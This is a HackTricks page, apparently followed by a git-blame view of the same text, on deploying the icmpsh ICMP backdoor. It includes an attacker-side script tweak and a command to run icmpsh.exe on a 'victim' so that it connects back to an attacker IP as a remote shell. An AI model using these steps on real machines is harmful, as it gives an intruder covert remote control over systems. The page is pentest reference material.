hacktricks/backdoors/icmpsh.md



<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)

# Client side

Execute the script: **run.sh**

**If you get some error, try to change the lines:**

```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```

**For:**

```bash
echo Please insert the IP where you want to listen
read IP
```

# **Victim Side**

Upload **icmpsh.exe** to the victim and execute:

```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```


<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

arte 2024-01-05 11:06:33 +00:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-05 11:06:33 +00:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-05 11:06:33 +00:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)`

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Client side`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Execute the script: run.sh`

			`If you get some error, try to change the lines:`

			```bash
			`IPINT=$(ifconfig \| grep "eth" \| cut -d " " -f 1 \| head -1)`
			`IP=$(ifconfig "$IPINT" \|grep "inet addr:" \|cut -d ":" -f 2 \|awk '{ print $1 }')`
			```

			`For:`

			```bash
			`echo Please insert the IP where you want to listen`
			`read IP`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Victim Side`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Upload icmpsh.exe to the victim and execute:`

			```bash
			`icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

arte 2024-01-05 11:06:33 +00:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-05 11:06:33 +00:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-05 11:06:33 +00:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00